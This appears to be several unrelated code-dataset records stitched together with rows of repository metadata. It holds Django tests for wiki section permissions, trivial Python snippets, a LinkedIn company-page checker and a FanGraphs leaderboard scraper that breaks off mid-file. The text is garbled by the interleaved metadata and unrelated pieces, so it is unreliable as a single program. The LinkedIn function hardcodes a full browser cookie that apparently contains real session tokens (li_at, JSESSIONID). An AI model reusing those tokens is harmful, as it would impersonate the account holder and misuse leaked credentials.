request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, oldsection.title)
self.assertEqual(wikis.pageorder, oldsection.pageorder)
self.assertEqual(wikis.createdby, oldsection.createdby)
self.assertEqual(wikis.updatedby, oldsection.updatedby)
self.assertEqual(wikis.updatedon, oldsection.updatedon)
def test_wiki_section_form_changed_request_fail_no_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
oldsection = copy.deepcopy(self.wikiSections[0])
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, oldsection.title)
self.assertEqual(wikis.pageorder, oldsection.pageorder)
self.assertEqual(wikis.createdby, oldsection.createdby)
self.assertEqual(wikis.updatedby, oldsection.updatedby)
self.assertEqual(wikis.updatedon, oldsection.updatedon)
def test_wiki_section_form_changed_request_failed_no_title(self):
post = {'action':'changed', 'targetid': self.wikiSections[0].unid, 'title': None}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'changed')
self.assertEqual(data['targetid'], self.wikiSections[0].unid)
self.assertEqual(data['PAGE_TITLE'], 'Change section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Change Section')
self.assertEqual(data['submbutton'], 'Change section')
self.assertEqual(data['deletebutton'], 'Delete section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue('title' in data['form'].initial)
self.assertEqual(data['form'].initial['title'], self.wikiSections[0].title)
self.assertEqual(data['form'].initial['pageorder'], self.wikiSections[0].pageorder)
self.assertEqual(data['form'].initial['text'], self.wikiSections[0].text)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_changed_request_fail_no_page(self):
post = {'action':'changed', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_changed_request_fail_no_target_id(self):
post = {'action':'changed'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_success_super_user(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except:
wikis=None
self.assertIsNone(wikis)
def test_wiki_section_form_delete_request_success_permissions(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.secondUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except:
wikis=None
self.assertIsNone(wikis)
def test_wiki_section_form_delete_request_fail_no_access(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except:
wikis=None
self.assertIsNotNone(wikis)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_fail_no_permissions(self):
post = {'action':'delete', 'targetid':self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
try:
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
except:
wikis=None
self.assertIsNotNone(wikis)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_fail_no_page(self):
post = {'action':'delete', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_delete_request_no_page(self):
post = {'action':'delete'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, uuid.uuid4())
self.assertEqual(result, self.wikimainpagelink)
def test_wiki_section_form_delete_request_fail_no_target_id(self):
post = {'action':'delete'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_form_create_no_page(self):
post = {'action':'add'}
method = 'GET'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormCreate(request, None)
self.assertIsNone(result)
| 52.279446 | 275 | 0.690286 | 2,499 | 22,637 | 6.138856 | 0.072029 | 0.100711 | 0.04954 | 0.041718 | 0.841992 | 0.828303 | 0.813506 | 0.785542 | 0.76892 | 0.75132 | 0 | 0.006833 | 0.185449 | 22,637 | 432 | 276 | 52.400463 | 0.825153 | 0 | 0 | 0.692893 | 0 | 0 | 0.076026 | 0.00243 | 0 | 0 | 0 | 0 | 0.299492 | 1 | 0.088832 | false | 0.010152 | 0.038071 | 0.005076 | 0.142132 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c87085397e4cebb4a2b5cf79eab231a90f6c118 | 25 | py | Python | tests.py | TypeGenie/TypeGenieAPIClient | 636ba9d34d46d469d3ff1e61dd177d4adac027f9 | [
"MIT"
] | 2 | 2021-05-27T05:32:57.000Z | 2022-03-29T23:06:06.000Z | test.py | resurfaceio/test-spark-heroku | 983582c10070299190c7763ba1a9aba4fa3ebfa3 | [
"MIT"
] | 9 | 2019-11-16T07:23:21.000Z | 2020-06-17T17:52:54.000Z | test.py | resurfaceio/test-apollo-heroku | 5d03779d48cd1b3f0519597e33b81f6404bdc00a | [
"MIT"
] | 1 | 2021-06-10T18:38:16.000Z | 2021-06-10T18:38:16.000Z | print("Running tests...") | 25 | 25 | 0.68 | 3 | 25 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 25 | 1 | 25 | 25 | 0.708333 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
9cddeb8d50c34594bf7f91653aa2cf114d0212c3 | 25 | py | Python | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | null | null | null | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | 1 | 2020-04-03T04:15:54.000Z | 2020-04-03T04:15:54.000Z | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | 2 | 2020-06-23T03:16:01.000Z | 2020-06-23T06:30:30.000Z | from . import drive, rk45 | 25 | 25 | 0.76 | 4 | 25 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 0.16 | 25 | 1 | 25 | 25 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9ceabd962c75cd4336c8ed6b557a2486a76a19ce | 3,406 | py | Python | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 1 | 2022-03-28T06:13:11.000Z | 2022-03-28T06:13:11.000Z | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 1 | 2021-12-21T13:59:47.000Z | 2021-12-21T13:59:47.000Z | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 10 | 2021-12-24T18:08:57.000Z | 2022-03-18T13:18:25.000Z | import requests
def validate_company_profile(company):
"""Validates compnay name
Criteria:
-> Company should have it's own page on LinkedIn
"""
company = company.replace(' ','').lower()
url = f"https://www.linkedin.com/company/{company}"
payload={}
headers = {
'authority': 'www.linkedin.com',
'method': 'GET',
'path': '/company/verizon/',
'scheme': 'https',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
'cookie': 'li_sugr=a9ec4480-7d0c-4845-95e7-39605d64191e; bcookie="v=2&8aaee4d9-dae2-4557-8982-764a1c4d8220"; bscookie="v=1&2022011215585042776796-5cc9-45a6-8cc5-81319174ccc1AQE_17iC6_72LTD8_p-00jJCspROFjDQ"; lang=v=2&lang=en-us; _gcl_au=1.1.417085013.1642018060; AMCVS_14215E3D5995C57C0A495C55%40AdobeOrg=1; aam_uuid=15799541411558395992045813087850080675; li_rm=AQFw0wobjO2NlAAAAX5P55PV9VBojDJkqKhl_YRquLswhB18wxW5CrzlKEbyd4a5Pkzg4sK4titxilH1vTM4uvdtNP51lhhdj3SPrI211t6J-s-eGf37cdyS; li_at=AQEDASpjhLADRqWwAAABfk_nnOUAAAF-c_Qg5U4Avoa3chQYq0gbZXsytq09SlpZZBggeNaQsXJ02AQ5fAJyV5Yq9vn0rTQoAszAKcsdg6bsVo-UHJcwisQGyxpLp3mVYESTXOa5hPbmf6Ba5Hr6g389; liap=true; JSESSIONID="ajax:8815064273025167449"; timezone=Asia/Calcutta; _guid=271bb573-1864-4058-8892-8bd0c8593a8d; AnalyticsSyncHistory=AQK2_sag26JQDQAAAX5P561HnSsDCdtE74-2dCE4vAO3tTg5oP08xO1DW6TitJ7n2Ipoaqxx28Rp0e9i3psPlw; lms_ads=AQGJAFOpD7Ij8gAAAX5P56_xR2RnnpHvzV7PrTt1XFYLLXOfaxm1c1IMWHrXs3fIiVy_5jZxQFCG_Pndonz85bkJkm3flnGG; lms_analytics=AQGJAFOpD7Ij8gAAAX5P56_xR2RnnpHvzV7PrTt1XFYLLXOfaxm1c1IMWHrXs3fIiVy_5jZxQFCG_Pndonz85bkJkm3flnGG; AMCV_14215E3D5995C57C0A495C55%40AdobeOrg=-637568504%7CMCIDTS%7C19005%7CMCMID%7C15228333244831983722065779036496648808%7CMCAAMLH-1642622895%7C12%7CMCAAMB-1642622895%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1642025295s%7CNONE%7CvVersion%7C5.1.1%7CMCCIDH%7C1805256044; pushPermState=default; UserMatchHistory=AQLX2VHUilNAGwAAAX5P7lNyoyxI9B84M8tf13u_SiN_IALpIUauE4yazo3Yufm_9LPkgAVn5VKMyMyhVUnY--bfSKzs3qsmM5rpP8p3d5--TLfiH1L7Yyr2FR2_AMrXURSzCgljGCNQXLQWtVy-yCYWZDkMD2IUaQP3HgVRVeioZkFsv46lBt_dzTqC5klUJUnRP7ywn60Zf_rLko6RJC-roHh9Zm87U4CXLndy15uCcrxDZtWj19oTx_C0U1qlOtZfZVieqKpd3n5WXCofxwi6EUbA_NQ2y5onENU; lidc="b=TB04:s=T:r=T:a=T:p=T:g=3867:u=732:x=1:i=1642018527:t=1642019932:v=2:sig=AQHV6hl79LViOd9L81EeA8aNCM1Ux1vn"; bcookie="v=2&fea97cf7-1aaf-4164-84b4-c7d2286b72bd"; lidc="b=TB04:s=T:r=T:a=T:p=T:g=3867:u=732:x=1:i=1642018814:t=1642019932:v=2:sig=AQG-TOHFdLb9PiOMqYMs9mRF2YMb0JDF"',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36'
}
response = requests.request("GET", url, headers=headers, data=payload).status_code
if response != 200:
# TODO: Sent a notification to admin
raise ValueError(f"{company} company is not verified.")
return company | 100.176471 | 2,012 | 0.758661 | 355 | 3,406 | 7.177465 | 0.68169 | 0.003925 | 0.003532 | 0.072998 | 0.035322 | 0.022763 | 0.022763 | 0.022763 | 0.022763 | 0.022763 | 0 | 0.213087 | 0.125073 | 3,406 | 34 | 2,013 | 100.176471 | 0.641946 | 0.0367 | 0 | 0 | 0 | 0.12 | 0.799877 | 0.645698 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9cf4a121a4521a2aa51bf3e72902832d7294e519 | 130 | py | Python | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import math
# Euclidean distance.
def dist(x1, x2, y1, y2):
return math.sqrt((x1-x2)**2 + (y1-y2)**2)
| 16.25 | 45 | 0.623077 | 23 | 130 | 3.521739 | 0.73913 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092593 | 0.169231 | 130 | 7 | 46 | 18.571429 | 0.657407 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9cfb2e1985aea3e5193ee96f719bb8c8df4fd240 | 32,843 | py | Python | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 10 | 2021-03-02T03:18:55.000Z | 2022-03-21T07:50:21.000Z | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 20 | 2021-03-03T22:21:23.000Z | 2021-09-02T16:57:49.000Z | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 1 | 2022-01-18T11:48:07.000Z | 2022-01-18T11:48:07.000Z | #! python3
# FanGraphs/leaders/leaders.py
"""
Scrpaer for the webpages under the FanGaphs **Leaders** tab.
"""
import csv
import datetime
import os
import fangraphs.exceptions
from fangraphs.leaders import ScrapingUtilities
from fangraphs import selectors
from fangraphs.selectors import leaders_sel
class GameSpan(ScrapingUtilities):
"""
Scraper for the FanGraphs `60-Game Span Leaderboards`_ page.
.. _60-Game Span Leaderboards: https://www.fangraphs.com/leaders/special/60-game-span
"""
__selections = {}
__dropdowns = {}
__waitfor = leaders_sel.GameSpan.waitfor
address = "https://fangraphs.com/leaders/special/60-game-span"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.GameSpan.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.GameSpan.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > a")
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=3)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class International(ScrapingUtilities):
"""
Scraper for the FanGraphs `KBO Leaderboards`_ page.
.. _KBO Leaderboards: https://www.fangraphs.com/leaders/international
"""
__selections = {}
__dropdowns = {}
__switches = {}
__waitfor = leaders_sel.International.waitfor
address = "https://www.fangraphs.com/leaders/international"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.International.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.International.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > a")
)
for cat, sel in leaders_sel.International.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(cls.__selections)
queries.extend(cls.__dropdowns)
queries.extend(cls.__switches)
return queries
def list_options(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__switches:
options = ["True", "False"]
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
:param query:
:return:
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=3)
elif query in self.__switches:
option = "True" if ",to" in self.page.url else "False"
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option == self.current_option(query):
return
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class MajorLeague(ScrapingUtilities):
"""
Scraper for the FanGraphs `Major League Leaderboards`_ page.
Note that the Splits Leaderboard is not covered.
Instead, it is covered by :py:class:`SplitsLeaderboards`.
.. _Major League Leaderboards: https://fangraphs.com/leaders.aspx
"""
__selections = {}
__dropdowns = {}
__switches = {}
__buttons = leaders_sel.MajorLeague.buttons
address = "https://fangraphs.com/leaders.aspx"
def __init__(self):
super().__init__(self.address, waitfor="")
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.MajorLeague.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel, "> div > ul > li")
)
for cat, sel in leaders_sel.MajorLeague.dropdowns.items():
options = leaders_sel.MajorLeague.dropdown_options[cat]
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > ul > li", options)
)
for cat, sel in leaders_sel.MajorLeague.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
queries.extend(list(cls.__switches))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__switches:
options = ["True", "False"]
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__selections:
options = self.__selections[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__switches:
option = self.__switches[query].current_option(opt_type=1)
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=1)
elif query in self.__selections:
option = self.__selections[query].current_option()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str, *, autoupdate=True):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:param autoupdate: If ``True``, any buttons attached to the filter query will be clicked
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query, option = query.lower(), str(option).lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option.lower() not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option != self.current_option(query).title():
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
if query in self.__buttons and autoupdate:
self.page.click(self.__buttons[query])
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data("#LeaderBoard1_cmdCSV", path)
class SeasonStat(ScrapingUtilities):
"""
Scraper for the FanGraphs `Season Stat Grid`_ page.
.. _Season Stat Grid: https://fangraphs.com/leaders/season-stat-grid
"""
__selections = {}
__dropdowns = {}
__waitfor = leaders_sel.SeasonStat.waitfor
address = "https://fangraphs.com/leaders/season-stat-grid"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.SeasonStat.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.SeasonStat.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be sued to modify search results.
:return: Filter queries which can be used to modify search results
:type: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtyp: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Argument ``query`` is invalid
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently configured to.
:param query: The filter query
:return: The option which the filter query is currently configured to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Argument ``query`` is invalid
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=2)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query
:param option: The option to configure ``query`` to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def _write_table_headers(self, writer: csv.writer):
"""
Writes the headers of the data table to the CSV file.
:param writer: The ``csv.writer`` object
"""
elems = self.soup.select(".table-scroll thead tr th")
headers = [e.getText() for e in elems]
writer.writerow(headers)
def _write_table_rows(self, writer: csv.writer):
"""
Iterates through the rows of the current data table.
The data in each row is written to the CSV file.
:param writer: The ``csv.writer`` object
"""
row_elems = self.soup.select(".table-scroll tbody tr")
for row in row_elems:
elems = row.select("td")
items = [e.getText() for e in elems]
writer.writerow(items)
def export(self, path=""):
"""
Scrapes and saves the data from the table of the current leaderboards.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *out/%d.%m.%y %H.%M.%S.csv*.
*Note: This is a 'manual' export of the data.
In other words, the data is scraped from the table.
This is unlike other forms of export where a button is clicked.
Thus, there will be no record of a download when the data is exported.*
:param path: The path to save the exported file to
"""
self._close_ad()
if not path or os.path.splitext(path)[1] != ".csv":
path = "out/{}.csv".format(
datetime.datetime.now().strftime("%d.%m.%y %H.%M.%S")
)
total_pages = int(
self.soup.select(
".table-page-control:nth-last-child(1) > .table-control-total"
)[0].getText()
)
with open(path, "w", newline="") as file:
writer = csv.writer(file)
self._write_table_headers(writer)
for _ in range(0, total_pages):
self._write_table_rows(writer)
self.page.click(
".table-page-control:nth-last-child(1) > .next"
)
self._refresh_parser()
class Splits(ScrapingUtilities):
"""
